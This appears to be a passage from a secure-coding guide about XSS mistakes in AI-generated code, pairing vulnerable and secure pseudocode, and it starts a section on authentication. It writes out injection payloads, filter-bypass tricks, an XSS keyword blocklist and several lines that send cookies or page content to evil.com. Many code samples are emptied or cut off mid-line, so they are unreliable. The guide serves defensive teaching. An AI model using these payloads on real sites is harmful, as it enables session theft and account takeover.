**Framework Misunderstanding:** Modern frameworks like React provide automatic escaping, but AI often bypasses these safeguards using `dangerouslySetInnerHTML`, `v-html`, or raw template interpolation when the task seems to require "rich" HTML output. + +4. **Encoding vs. Validation Confusion:** AI models often implement input validation (checking what characters are allowed) but skip output encoding (safely rendering data in context). Validation is for data integrity; encoding is for XSS prevention. + +5. **Client-Side Trust:** AI frequently treats client-side code as "safe" since it runs in the browser. It fails to recognize that XSS attacks *exploit* the browser's trust in the application. + +**Impact of XSS:** + +- **Session Hijacking:** Attacker steals session cookies and impersonates victims +- **Account Takeover:** Keylogging, credential theft, or forced password changes +- **Data Exfiltration:** Stealing sensitive data displayed to the user +- **Malware Distribution:** Redirecting users to malicious sites +- **Defacement:** Altering page content for phishing or reputation damage +- **Worm Propagation:** Self-spreading XSS (Samy worm affected 1M MySpace users) + +**XSS Variants:** + +| Type | Storage | Execution | Example Vector | +|------|---------|-----------|----------------| +| **Reflected** | URL/Request | Immediate | Search query in results page | +| **Stored** | Database | Later visitors | Comment with script in blog | +| **DOM-based** | Client-side | JavaScript processes | URL fragment processed by JS | +| **Mutation (mXSS)** | Sanitizer bypass | DOM mutation | Markup that changes during parsing | + +--- + +## Multiple BAD Examples Across Contexts + +### BAD Example 1: HTML Body Injection + +```pseudocode +// VULNERABLE: Direct injection into HTML body +function displayUserComment(comment): + // User input directly placed in HTML + document.getElementById("comments").innerHTML = + "
<div class='comment'>" + comment + "</div>
" + +// Attack: comment = "" +// Result: Script executes, cookies sent to attacker + +// VULNERABLE: Server-side template without encoding +function renderProfilePage(username, bio): + return """ + + +
<h1>Profile: {username}</h1>
+ <p>{bio}</p>
+ + + """.format(username=username, bio=bio) + +// Attack: bio = "" +// Result: onerror handler executes JavaScript + +// VULNERABLE: Using document.write +function showWelcome(name): + document.write("
<h1>Welcome, " + name + "!</h1>
") + +// Attack: name = "" +``` + +**Why This Is Dangerous:** +- Script tags execute immediately upon DOM insertion +- Event handlers (`onerror`, `onload`, `onclick`) execute without script tags +- SVG elements can contain executable code +- `document.write` and `innerHTML` interpret HTML in user input + +--- + +### BAD Example 2: HTML Attribute Injection + +```pseudocode +// VULNERABLE: User input in HTML attributes +function renderImage(imageUrl, altText): + return '' + altText + '' + +// Attack: altText = '" onmouseover="alert(document.cookie)" x="' +// Result: + +// VULNERABLE: Unquoted attributes +function renderLink(url, text): + return "" + text + "" + +// Attack: url = "http://site.com onclick=alert(1)" +// Result: text + +// VULNERABLE: Input in style attribute +function setBackgroundColor(color): + element.setAttribute("style", "background-color: " + color) + +// Attack: color = "red; background-image: url('javascript:alert(1)')" +// Attack: color = "expression(alert('XSS'))" // IE-specific + +// VULNERABLE: Event handler attribute +function renderButton(buttonId, label): + return '' + +// Attack: label = "'); alert(document.cookie); ('" +// Result: onclick="handleClick(''); alert(document.cookie); ('")" +``` + +**Why This Is Dangerous:** +- Unquoted attributes break at whitespace, allowing new attributes +- Quoted attributes can break out with matching quotes +- Event handler attributes execute JavaScript directly +- Certain attributes (`href`, `src`, `style`) have special parsing rules + +--- + +### BAD Example 3: JavaScript Context Injection + +```pseudocode +// VULNERABLE: User input embedded in JavaScript +function generateUserScript(username): + return """ + + """.format(username=username) + +// Attack: username = "'; alert(document.cookie); //'" +// Result: var currentUser = ''; alert(document.cookie); //'; + +// VULNERABLE: JSON data embedded in script +function embedUserData(userData): + return """ + + """.format(userData=jsonEncode(userData)) + 
+// Attack: userData contains +// JSON encoding doesn't prevent HTML context escape + +// VULNERABLE: Template literals with user input +function renderTemplate(message): + return `` + +// Attack: message = '${alert(document.cookie)}' // Template literal injection +// Attack: message = '");alert(document.cookie);//' // String escape + +// VULNERABLE: Dynamic script construction +function addEventHandler(eventName, userCallback): + element.setAttribute("onclick", "handleEvent('" + userCallback + "')") + +// Attack: userCallback = "'); stealData(); ('" +``` + +**Why This Is Dangerous:** +- JavaScript string context requires JavaScript-specific escaping +- HTML closing tags (``) can break out of script blocks +- Template literals have their own injection risks +- Inline event handlers compound HTML and JavaScript contexts + +--- + +### BAD Example 4: URL Context Injection + +```pseudocode +// VULNERABLE: User input in href attribute +function renderNavLink(destination): + return 'Click here' + +// Attack: destination = "javascript:alert(document.cookie)" +// Result: Click here + +// VULNERABLE: URL parameters without encoding +function buildSearchUrl(query): + return 'Search again' + +// Attack: query = '" onclick="alert(1)" x="' +// Result: Search again + +// VULNERABLE: Redirect based on user input +function handleRedirect(url): + window.location = url + +// Attack: url = "javascript:alert(document.cookie)" +// Result: JavaScript execution via location change + +// VULNERABLE: Open redirect leading to XSS +function redirectAfterLogin(returnUrl): + return '' + +// Attack: returnUrl = "data:text/html," +// Attack: returnUrl = "javascript:alert(1)" +``` + +**Why This Is Dangerous:** +- `javascript:` URLs execute code when navigated +- `data:` URLs can contain executable HTML/JavaScript +- `vbscript:` URLs execute on older IE +- URL encoding alone doesn't prevent protocol-based attacks + +--- + +### BAD Example 5: CSS Context Injection + +```pseudocode +// VULNERABLE: 
User input in CSS +function applyCustomStyle(customCss): + styleElement = document.createElement("style") + styleElement.textContent = ".user-style { " + customCss + " }" + document.head.appendChild(styleElement) + +// Attack: customCss = "} body { background: url('http://evil.com/log?data=' + document.cookie); } .x {" +// Result: CSS exfiltration of page data + +// VULNERABLE: CSS expression (legacy IE) +function setWidth(width): + element.style.cssText = "width: " + width + +// Attack: width = "expression(alert(document.cookie))" +// Result: JavaScript execution via CSS expression (IE) + +// VULNERABLE: CSS injection via style attribute +function renderAvatar(avatarUrl): + return '
' + +// Attack: avatarUrl = "x); } body { background: red; } .x { content: url(x" +// Modern Attack: avatarUrl = "https://evil.com/?' + btoa(document.body.innerHTML) + '" + +// VULNERABLE: CSS @import injection +function loadTheme(themeUrl): + return "" + +// Attack: themeUrl = "'); } * { background: url('http://evil.com/steal?" +``` + +**Why This Is Dangerous:** +- CSS can exfiltrate data via `url()` requests +- Legacy IE `expression()` executes JavaScript +- CSS injection can alter page appearance for phishing +- `@import` can load attacker-controlled stylesheets + +--- + +## GOOD Examples for Each Context + +### GOOD Example 1: Proper HTML Encoding + +```pseudocode +// SECURE: HTML entity encoding for body content +function htmlEncode(str): + return str + .replace("&", "&amp;") // Must be first + .replace("<", "&lt;") + .replace(">", "&gt;") + .replace('"', "&quot;") + .replace("'", "&#x27;") + .replace("/", "&#x2F;") // Prevents </script> escapes + +function displayUserComment(comment): + safeComment = htmlEncode(comment) + document.getElementById("comments").innerHTML = + "<div class='comment'>" + safeComment + "</div>" + +// SECURE: Using textContent instead of innerHTML +function displayUserCommentSafe(comment): + div = document.createElement("div") + div.className = "comment" + div.textContent = comment // Automatically safe - no HTML interpretation + document.getElementById("comments").appendChild(div) + +// SECURE: Server-side template with auto-escaping +function renderProfilePage(username, bio): + // Use templating engine with auto-escaping enabled + return template.render("profile.html", { + username: username, // Engine auto-escapes + bio: bio + }) + +// SECURE: Framework createElement pattern +function createUserCard(name, email): + card = document.createElement("article") + + nameEl = document.createElement("h3") + nameEl.textContent = name // Safe + + emailEl = document.createElement("p") + emailEl.textContent = email // Safe + + card.appendChild(nameEl) + card.appendChild(emailEl) + return card +``` + +**Why This Is Secure:** +- HTML entities are displayed as text, not interpreted as markup +- `textContent` never interprets HTML +- createElement + textContent is inherently safe +- Auto-escaping templates handle encoding automatically + +--- + +### GOOD Example 2: Proper Attribute Encoding + +```pseudocode +// SECURE: Attribute encoding (superset of HTML encoding) +function attributeEncode(str): + return str + .replace("&", "&amp;") + .replace("<", "&lt;") + .replace(">", "&gt;") + .replace('"', "&quot;") + .replace("'", "&#x27;") + .replace("`", "&#x60;") + .replace("=", "&#x3D;") + +// SECURE: Always quote attributes and encode values +function renderImage(imageUrl, altText): + safeUrl = attributeEncode(imageUrl) + safeAlt = attributeEncode(altText) + return '<img src="' + safeUrl + '" alt="' + safeAlt + '">' + +// SECURE: Using setAttribute (browser handles encoding) +function renderImageSafe(imageUrl, altText): + img = document.createElement("img") + img.setAttribute("src", imageUrl) // Safe + img.setAttribute("alt", altText) // Safe + return img + +// SECURE: Data attributes with proper encoding +function 
renderDataElement(userId, userName): + div = document.createElement("div") + div.dataset.userId = userId // Automatically safe + div.dataset.userName = userName // Automatically safe + return div + +// SECURE: Style attribute with validation +ALLOWED_COLORS = {"red", "blue", "green", "yellow", "#fff", "#000"} + +function setBackgroundColor(color): + if color in ALLOWED_COLORS: + element.style.backgroundColor = color + else: + element.style.backgroundColor = "white" // Safe default +``` + +**Why This Is Secure:** +- Quotes prevent attribute breakout +- Encoding prevents quote escapes +- setAttribute handles encoding automatically +- dataset properties are automatically safe +- Allowlists prevent injection of arbitrary values + +--- + +### GOOD Example 3: JavaScript Encoding + +```pseudocode +// SECURE: JavaScript string encoding +function jsStringEncode(str): + return str + .replace("\\", "\\\\") // Backslash first + .replace("'", "\\'") + .replace('"', '\\"') + .replace("\n", "\\n") + .replace("\r", "\\r") + .replace(" breakout + safeJson = htmlEncode(jsonData) + + return """ + + """.format(safeJson=safeJson) + +// BETTER: Use data attributes instead of inline scripts +function embedUserDataSafe(element, userData): + // Store data in attribute, process in external script + element.dataset.user = jsonEncode(userData) + // External script reads: JSON.parse(element.dataset.user) + +// SECURE: Separate data from code with JSON endpoint +function loadUserData(): + // Instead of embedding in HTML, fetch from API + fetch('/api/user/data') + .then(response => response.json()) + .then(data => processData(data)) + +// SECURE: Using structured data in script type +function embedStructuredData(pageData): + return """ + + + """.format(jsonData=jsonEncode(pageData)) +``` + +**Why This Is Secure:** +- JavaScript escaping prevents string breakout +- HTML encoding in script blocks prevents `` escape +- Data attributes separate data from code +- JSON endpoints avoid embedding 
untrusted data in HTML +- `type="application/json"` blocks aren't executed as JavaScript + +--- + +### GOOD Example 4: URL Encoding + +```pseudocode +// SECURE: URL encoding for query parameters +function urlEncode(str): + return encodeURIComponent(str) + +function buildSearchUrl(query): + safeQuery = urlEncode(query) + return '/search?q=' + safeQuery + +// SECURE: Validating URL schemes (allowlist) +SAFE_SCHEMES = {"http", "https", "mailto"} + +function validateUrl(url): + try: + parsed = parseUrl(url) + if parsed.scheme.lower() in SAFE_SCHEMES: + return url + catch: + pass + return "/fallback" // Safe default + +function renderLink(destination, text): + safeUrl = validateUrl(destination) + safeText = htmlEncode(text) + return '' + safeText + '' + +// SECURE: URL validation with additional checks +function validateExternalUrl(url): + parsed = parseUrl(url) + + // Check scheme + if parsed.scheme.lower() not in {"http", "https"}: + return null + + // Check for credential injection + if parsed.username or parsed.password: + return null + + // Check for IP address (optional restriction) + if isIpAddress(parsed.host): + return null + + return url + +// SECURE: Relative URLs only (prevent open redirect) +function validateRedirectUrl(url): + // Only allow relative paths + if url.startsWith("/") and not url.startsWith("//"): + // Prevent path traversal + normalized = normalizePath(url) + if not ".." in normalized: + return normalized + return "/" // Safe default +``` + +**Why This Is Secure:** +- `encodeURIComponent` handles special characters +- Scheme allowlist prevents `javascript:` and `data:` URLs +- Relative-only validation prevents open redirects +- Multiple validation layers provide defense in depth + +--- + +### GOOD Example 5: Using Safe APIs (textContent vs innerHTML) + +```pseudocode +// SECURE: Safe DOM manipulation patterns + +// Instead of innerHTML with user data: +// DANGEROUS: element.innerHTML = "
<div>" + userInput + "</div>
" + +// SECURE: Use textContent for text nodes +function setElementText(element, text): + element.textContent = text // Never interprets HTML + +// SECURE: Build DOM programmatically +function createListItem(text, isHighlighted): + li = document.createElement("li") + li.textContent = text // Safe text assignment + + if isHighlighted: + li.classList.add("highlighted") // Safe class manipulation + + return li + +// SECURE: Use template elements for complex HTML +function createCardFromTemplate(name, description): + template = document.getElementById("card-template") + card = template.content.cloneNode(true) + + // Set text content safely + card.querySelector(".card-name").textContent = name + card.querySelector(".card-desc").textContent = description + + return card + +// SECURE: Use DocumentFragment for batch operations +function renderList(items): + fragment = document.createDocumentFragment() + + for item in items: + li = document.createElement("li") + li.textContent = item.name // Safe + fragment.appendChild(li) + + document.getElementById("list").appendChild(fragment) + +// SECURE: Sanitize when HTML is genuinely needed +function renderRichContent(htmlContent): + // Use DOMPurify or similar trusted sanitizer + sanitized = DOMPurify.sanitize(htmlContent, { + ALLOWED_TAGS: ["b", "i", "em", "strong", "a", "p", "br"], + ALLOWED_ATTR: ["href"], + ALLOW_DATA_ATTR: false + }) + element.innerHTML = sanitized +``` + +**Why This Is Secure:** +- `textContent` never interprets HTML or scripts +- `createElement` + `textContent` is inherently safe +- Templates allow complex HTML without injection risk +- DOMPurify provides sanitization when HTML is required + +--- + +## Edge Cases Section + +### Edge Case 1: Mutation XSS (mXSS) + +```pseudocode +// DANGEROUS: Browser mutations can bypass sanitization + +// How mXSS works: +// 1. Sanitizer processes malformed HTML +// 2. Browser "fixes" the HTML during parsing +// 3. 
Fixed HTML contains executable content + +// Example: Backtick mutation +inputHtml = "" +// Some sanitizers don't escape backticks +// Browser may convert backticks to quotes in certain contexts + +// Example: Namespace confusion +inputHtml = "" +// SVG/MathML namespaces have different parsing rules +// Sanitizer might miss the nested script + +// Example: Table element mutations +inputHtml = "
" +// Browser moves
outside during parsing +// Can result in unexpected DOM structure + +// SECURE: Use battle-tested sanitizer with mXSS protection +function sanitizeHtml(html): + return DOMPurify.sanitize(html, { + // DOMPurify has mXSS protection built-in + USE_PROFILES: {html: true}, + // Optionally restrict further + FORBID_TAGS: ["style", "math", "svg"], + FORBID_ATTR: ["style"] + }) + +// BETTER: Avoid HTML sanitization when possible +function renderUserContent(content): + // If you only need formatted text, use markdown + markdownHtml = markdownToHtml(content) // Controlled conversion + return DOMPurify.sanitize(markdownHtml) +``` + +**Detection:** Test with: +- Malformed nesting (`
`) +- Namespace elements (``, ``, ``) +- Backticks and other unusual quote characters +- Processing instruction-like content (``) + +--- + +### Edge Case 2: Polyglot Payloads + +```pseudocode +// DANGEROUS: Payloads that work in multiple contexts + +// Polyglot XSS example: +payload = "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcLiCk=alert() )//%0D%0A%0d%0a//\\x3csVg/" + +// This payload attempts to work in: +// - JavaScript context (javascript: URL) +// - HTML attribute context (onclick) +// - Inside HTML comments +// - Inside style/title/textarea/script tags +// - SVG context + +// Why this matters: +// - Single payload tests multiple vectors +// - Fuzzy input handling might trigger in unexpected context +// - Copy-paste from "safe" context to unsafe context + +// SECURE: Context-specific encoding, not generic filtering +function outputToContext(value, context): + switch context: + case "html_body": + return htmlEncode(value) + case "html_attribute": + return attributeEncode(value) + case "javascript_string": + return jsStringEncode(value) + case "url_parameter": + return urlEncode(value) + case "css_value": + return cssEncode(value) + default: + throw Error("Unknown context: " + context) + +// Each encoder handles that specific context's dangerous characters +``` + +**Detection:** Use polyglot payloads in security testing to find context confusion vulnerabilities. 
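The context-specific encoding dispatch described above can be sketched in Python using only the standard library. This is a minimal illustration under stated assumptions, not a replacement for a vetted encoding library: the function name `encode_for_context` is hypothetical, and the CSS context from the pseudocode is left out because the standard library ships no CSS encoder.

```python
import html
import json
from urllib.parse import quote


def encode_for_context(value: str, context: str) -> str:
    """Encode an untrusted string for one specific output context."""
    if context == "html_body":
        # Escapes & < > only; quotes are harmless in element body text.
        return html.escape(value, quote=False)
    if context == "html_attribute":
        # Also escapes " and ' so the value cannot leave a quoted attribute.
        return html.escape(value, quote=True)
    if context == "javascript_string":
        # json.dumps produces a quoted, escaped string literal. Escaping
        # <, > and & as well keeps the literal inert inside a script block.
        literal = json.dumps(value)
        return (
            literal.replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026")
        )
    if context == "url_parameter":
        # safe="" percent-encodes "/" along with the other reserved characters.
        return quote(value, safe="")
    # Fail closed: an unknown context must never fall back to "no encoding".
    raise ValueError(f"Unknown context: {context}")
```

Raising on an unknown context mirrors the `throw` in the pseudocode: silently returning the raw value would reintroduce the context confusion that polyglot payloads exploit.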
+ +--- + +### Edge Case 3: Encoding Bypass Techniques + +```pseudocode +// DANGEROUS: Incomplete encoding can be bypassed + +// Bypass 1: Case variation +// Filter checks: if "alert(1)" +// Browser: case-insensitive HTML parsing + +// Bypass 2: HTML entities in event handlers +// Filter: remove "javascript:" +// Input: "javascript:alert(1)" +// Browser decodes entities before processing + +// Bypass 3: Null bytes +// Input: "java\x00script:alert(1)" +// Some filters/WAFs don't handle null bytes +// Some browsers ignore them + +// Bypass 4: Overlong UTF-8 +// Normal '<': 0x3C +// Overlong: 0xC0 0xBC (invalid UTF-8, but some parsers accept) + +// Bypass 5: Mixed encoding +// Input: "%3Cscript%3Ealert(1)%3C/script%3E" +// If HTML-encoded before URL-decoded, double encoding attack + +// SECURE: Encode on output, not filter on input +function secureOutput(userInput, context): + // Don't try to filter/blocklist dangerous patterns + // DO encode appropriately for the output context + + // The encoding makes ALL user input safe + // regardless of what it contains + return encode(userInput, context) + +// SECURE: Canonicalize THEN validate +function processInput(input): + // 1. Decode all encoding layers + decoded = fullyDecode(input) // URL, HTML entities, etc. + + // 2. Normalize (lowercase, normalize unicode) + normalized = normalize(decoded) + + // 3. Validate against rules + if not isValid(normalized): + reject() + + // 4. Store normalized form + store(normalized) + + // 5. Encode on output (later) +``` + +**Key Insight:** Output encoding is more reliable than input filtering because you know the exact output context. 
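A short Python sketch may make the key insight concrete. It assumes a hypothetical single-pattern blocklist (`naive_filter`) and a hypothetical HTML renderer (`render_comment`); neither name comes from the original patterns. The URL-encoded payload from Bypass 5 slips past the filter, while encoding at output time neutralizes the same data.

```python
import html
from urllib.parse import unquote


def naive_filter(value: str) -> str:
    """Blocklist filter (the anti-pattern): strips one literal pattern."""
    return value.replace("<script>", "")


def render_comment(value: str) -> str:
    """Encode at output time for the HTML body context."""
    return "<p>" + html.escape(value) + "</p>"


payload = "%3Cscript%3Ealert(1)%3C/script%3E"

# The filter sees no literal "<script>", so the payload passes unchanged,
# and a later URL-decoding step turns it back into live markup.
filtered = naive_filter(payload)
decoded_after_filter = unquote(filtered)

# Encoding the decoded value for its output context makes it inert,
# whatever characters it happens to contain.
safe_html = render_comment(unquote(payload))
```

The filter fails because it runs before the final decoding step; the encoder works because it runs last, at the point where the output context is known.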
+ +--- + +### Edge Case 4: DOM Clobbering + +```pseudocode +// DANGEROUS: HTML elements can override JavaScript globals + +// How DOM clobbering works: +// Elements with id or name attributes create global variables +html = '' +// Now: window.alert === element +// alert(1) throws error instead of showing alert + +// Exploitable clobbering: +html = '' +// document.cookie might now reference the input element + +// Attack on sanitizer output: +html = '' +// If code does: location = document.getElementById(cid) +// Attacker controls the navigation + +// More dangerous patterns: +html = '
' +// x.y now references the input +// Chains allow deep property access + +// SECURE: Avoid global lookups for security-sensitive operations +function getConfigValue(key): + // DON'T: return window[key] + // DON'T: return document.getElementById(key).value + + // DO: Use a namespaced config object + return APP_CONFIG[key] + +// SECURE: Use unique prefixes for security-critical IDs +function getElementById(id): + // Prefix with app-specific namespace + return document.getElementById("app__" + id) + +// SECURE: Validate types after DOM queries +function getFormElement(id): + element = document.getElementById(id) + if element instanceof HTMLFormElement: + return element + throw Error("Expected form element") +``` + +**Detection:** Test with: +- Elements with IDs matching JavaScript globals (`alert`, `name`, `location`) +- Elements with names matching object properties (`cookie`, `domain`) +- Nested forms with chained name/id attributes + +--- + +## Common Mistakes Section + +### Mistake 1: Encoding Once, Using in Multiple Contexts + +```pseudocode +// DANGEROUS: Single encoding for multiple contexts + +function saveUserProfile(name, bio): + // Encoding once at input time + safeName = htmlEncode(name) + safeBio = htmlEncode(bio) + + database.save({name: safeName, bio: safeBio}) + +function displayProfile(user): + // HTML context - HTML encoding was correct + htmlOutput = "

" + user.name + "

" // OK + + // But JavaScript context needs different encoding! + jsOutput = "" + // If name contained single quotes: "O'Brien" -> already encoded as "O'Brien" + // Now in JS context, ' is literal text, not a quote escape + + // And URL context is wrong too! + urlOutput = "/profile?name=" + user.name + // HTML entities in URL don't encode properly + +// SECURE: Store raw data, encode on output +function saveUserProfile(name, bio): + // Store raw (unencoded) user input + database.save({name: name, bio: bio}) + +function displayProfile(user): + // Encode specifically for each output context + htmlName = htmlEncode(user.name) + jsName = jsStringEncode(user.name) + urlName = urlEncode(user.name) + + htmlOutput = "

" + htmlName + "

" + jsOutput = "" + urlOutput = "/profile?name=" + urlName +``` + +**Rule:** Store data raw. Encode at the point of output, specific to that context. + +--- + +### Mistake 2: Client-Side Only Sanitization + +```pseudocode +// DANGEROUS: Relying only on client-side protection + +// Client-side sanitization +function submitComment(comment): + // Sanitize before sending to server + cleanComment = DOMPurify.sanitize(comment) + fetch("/api/comments", { + method: "POST", + body: JSON.stringify({comment: cleanComment}) + }) + +// Problem: Attacker bypasses client-side code entirely +// Using curl, Postman, or modified browser +curlCommand = """ +curl -X POST https://site.com/api/comments \\ + -H "Content-Type: application/json" \\ + -d '{"comment": ""}' +""" + +// Server trusts the input because "client sanitized it" +function handleCommentApi(request): + comment = request.body.comment + database.saveComment(comment) // Stored XSS! + +// SECURE: Server-side sanitization is mandatory +function handleCommentApiSecure(request): + comment = request.body.comment + + // Server-side sanitization + cleanComment = serverSideSanitize(comment) + + database.saveComment(cleanComment) + +function displayComment(comment): + // Still encode on output (defense in depth) + return htmlEncode(comment) + +// NOTE: Client-side sanitization can still be useful for: +// - Preview functionality +// - Reducing server load +// - Better UX feedback +// But it must NEVER be the only protection +``` + +**Rule:** Server-side encoding/sanitization is mandatory. Client-side is optional enhancement. + +--- + +### Mistake 3: Blocklist Approaches + +```pseudocode +// DANGEROUS: Trying to block known-bad patterns + +function filterXss(input): + // Block list approach + dangerous = [ + "", + "javascript:", + "onerror", "onload", "onclick", + "alert", "eval", "document.cookie" + ] + + result = input + for pattern in dangerous: + result = result.replace(pattern, "") + + return result + +// Bypasses: +// 1. 
Case: "" +// 2. Encoding: "<script>alert(1)</script>" +// 3. Null bytes: "alert(1)" +// 4. Other events: "onmouseover", "onfocus", "onanimationend" +// 5. Other sinks: "fetch('http://evil.com/'+document.cookie)" +// 6. New features: Future HTML/JS features not in blocklist + +// DANGEROUS: Regex blocklist +function filterXssRegex(input): + // Still bypassable + if regex.match(/.*?<\/script>/i, input): + return "" + return input + +// Bypass: "ipt>alert(1)ipt>" +// After removal: "" + +// SECURE: Allowlist approach +function sanitizeUsername(input): + // Only allow expected characters + if regex.match(/^[a-zA-Z0-9_-]{1,30}$/, input): + return input + throw ValidationError("Invalid username") + +// SECURE: Proper encoding (makes blocklist unnecessary) +function displaySafely(input): + return htmlEncode(input) // All input is safe after encoding +``` + +**Rule:** Allowlist what's expected, or encode everything. Never blocklist dangerous patterns. + +--- + +### Mistake 4: Trusting Sanitization Libraries Blindly + +```pseudocode +// DANGEROUS: Assuming sanitization handles everything + +function processHtml(userHtml): + // "The library handles XSS" + clean = sanitizer.sanitize(userHtml) + + // But then using it unsafely: + // 1. Wrong context + return "" + // Sanitizer cleaned HTML context, not JavaScript context + + // 2. Double encoding + clean = sanitizer.sanitize(htmlEncode(userHtml)) + // Now clean contains encoded entities that might decode later + + // 3. Post-processing that reintroduces vulnerabilities + processed = clean.replace("[link]", "
link") + // Custom processing after sanitization can break safety + +// SECURE: Understand what the sanitizer does +function processHtmlSecure(userHtml): + // 1. Sanitize for HTML context + cleanHtml = DOMPurify.sanitize(userHtml, { + ALLOWED_TAGS: ["p", "b", "i", "a"], + ALLOWED_ATTR: ["href"] + }) + + // 2. Validate URLs in allowed href attributes + dom = parseHtml(cleanHtml) + for link in dom.querySelectorAll("a[href]"): + if not isValidUrl(link.href): + link.removeAttribute("href") + + // 3. Use only in HTML context + return cleanHtml + +// SECURE: For JavaScript context, don't use HTML sanitizer +function embedDataInJs(data): + // JSON encoding is the appropriate "sanitizer" for JSON/JS + return JSON.stringify(data) // Handles all escaping for JSON +``` + +**Rule:** Use the right encoding/sanitization for each context. Sanitizers are context-specific. + +--- + +## Framework-Specific Guidance (Pseudocode Patterns) + +### React Pattern + +```pseudocode +// React default: Auto-escaping in JSX +function UserProfile(props): + // SAFE: React escapes by default + return ( +
+

{props.username}

// Auto-escaped +

{props.bio}

// Auto-escaped +
+ ) + +// DANGEROUS: dangerouslySetInnerHTML bypasses protection +function RichContent(props): + // VULNERABLE if props.html is user-controlled + return
+ +// SECURE: Sanitize before using dangerouslySetInnerHTML +function RichContentSafe(props): + sanitizedHtml = DOMPurify.sanitize(props.html) + return
+ +// DANGEROUS: href with user input +function UserLink(props): + // VULNERABLE: javascript: URLs execute + return {props.text} + +// SECURE: Validate URL scheme +function UserLinkSafe(props): + url = props.url + if not url.startsWith("http://") and not url.startsWith("https://"): + url = "#" // Safe fallback + return {props.text} +``` + +--- + +### Vue Pattern + +```pseudocode +// Vue default: Auto-escaping with {{ }} + + +// DANGEROUS: v-html bypasses protection + + +// SECURE: Sanitize before v-html + + + +// DANGEROUS: Dynamic attribute binding + + +// SECURE: URL validation + +``` + +--- + +### Angular Pattern + +```pseudocode +// Angular default: Auto-sanitization +@Component({ + template: ` + +

{{ username }}

+

{{ bio }}

+ ` +}) + +// Angular [innerHTML] is semi-safe (Angular sanitizes) +@Component({ + template: ` + +
+ ` +}) + +// DANGEROUS: Bypassing sanitization +import { DomSanitizer } from '@angular/platform-browser' + +@Component({...}) +class MyComponent { + constructor(private sanitizer: DomSanitizer) {} + + // VULNERABLE: Bypasses Angular's sanitization + get unsafeHtml() { + return this.sanitizer.bypassSecurityTrustHtml(this.userInput) + } +} + +// SECURE: Let Angular sanitize, or use additional sanitizer +@Component({...}) +class MyComponentSafe { + get safeHtml() { + // Angular's default sanitization is usually sufficient + // For extra safety, pre-sanitize + return DOMPurify.sanitize(this.userInput) + } +} +``` + +--- + +### Server-Side Template Engines Pattern + +```pseudocode +// Jinja2 (Python) +// SAFE: Auto-escaping by default +

{{ username }}

+ +// DANGEROUS: |safe filter +
{{ user_html | safe }}
+ +// Handlebars +// SAFE: {{ }} escapes +

{{username}}

+ +// DANGEROUS: {{{ }}} triple braces +
{{{user_html}}}
+ +// EJS (Node.js) +// SAFE: <%= %> escapes +

<%= username %>

+ +// DANGEROUS: <%- %> raw +
<%- user_html %>
+ +// SECURE PATTERN: Always use escaping syntax, sanitize if HTML needed +// Jinja2 +
{{ user_html | sanitize }}
+ +// Handlebars +
{{sanitize user_html}}
+ +// EJS +
<%= sanitize(user_html) %>
+``` + +--- + +## Security Checklist + +- [ ] All user input rendered in HTML is HTML-encoded +- [ ] All user input in HTML attributes is attribute-encoded and quoted +- [ ] All user input in JavaScript strings is JavaScript-encoded +- [ ] All user input in URLs is URL-encoded (and scheme validated for links) +- [ ] All user input in CSS is CSS-encoded or allowlist-validated +- [ ] `innerHTML`, `document.write`, and similar are avoided or use sanitized input +- [ ] `textContent` is used instead of `innerHTML` where possible +- [ ] `dangerouslySetInnerHTML`, `v-html`, `|safe` etc. are only used with sanitized content +- [ ] URL schemes are validated (allow only http/https, not javascript:) +- [ ] Server-side encoding/sanitization is implemented (not just client-side) +- [ ] Encoding is performed at output time, specific to each context +- [ ] HTML sanitizer (DOMPurify) is used when rich HTML input is required +- [ ] Content Security Policy (CSP) headers are implemented +- [ ] `X-Content-Type-Options: nosniff` is set; the deprecated `X-XSS-Protection` header is omitted or set to `0` (rely on CSP instead) +- [ ] Cookie HttpOnly flag is set to prevent JavaScript access +- [ ] No user input reaches eval(), new Function(), or setTimeout with strings +- [ ] Framework auto-escaping is enabled and not bypassed + +--- + +# Pattern 4: Authentication and Session Security + +**CWE References:** CWE-287 (Improper Authentication), CWE-384 (Session Fixation), CWE-613 (Insufficient Session Expiration), CWE-307 (Improper Restriction of Excessive Authentication Attempts), CWE-308 (Use of Single-factor Authentication), CWE-640 (Weak Password Recovery Mechanism), CWE-1275 (Sensitive Cookie with Improper SameSite Attribute) + +**Priority Score:** 22 (Frequency: 8, Severity: 9, Detectability: 5) + +--- + +## Introduction: High Complexity Leads to High AI Error Rate + +Authentication and session management are among the most complex security domains in application development. 
AI models struggle particularly with these patterns for several interconnected reasons: + +**Why AI Models Generate Insecure Authentication Code:** + +1. **Complexity Breeds Shortcuts:** Authentication requires coordinating multiple components—password storage, session management, token generation, cookie handling, and logout procedures. AI models often generate "working" code that skips essential security layers for simplicity. + +2. **Tutorial Syndrome:** Training data is saturated with simplified authentication tutorials designed to teach concepts, not build production systems. These tutorials often omit rate limiting, secure token generation, proper session invalidation, and timing attack prevention. + +3. **JWT Misunderstandings:** JSON Web Tokens have become the default recommendation, but AI models frequently generate JWT implementations with critical flaws—the "none" algorithm vulnerability, weak secrets, improper validation, and insecure storage. + +4. **Framework Diversity:** Authentication patterns vary dramatically across frameworks (Passport.js, Spring Security, Django, Rails Devise, etc.). AI models conflate patterns between frameworks, generating hybrid code that's neither correct for any framework nor secure. + +5. **Stateless vs. Stateful Confusion:** The shift toward stateless authentication (JWTs) has created mixed patterns in training data. AI often combines stateless token concepts with stateful session assumptions, creating logical gaps in security. + +6. **Edge Case Blindness:** Authentication edge cases—concurrent sessions, password reset flows, account recovery, MFA, and OAuth state management—require deep security thinking that AI models cannot reliably produce. 
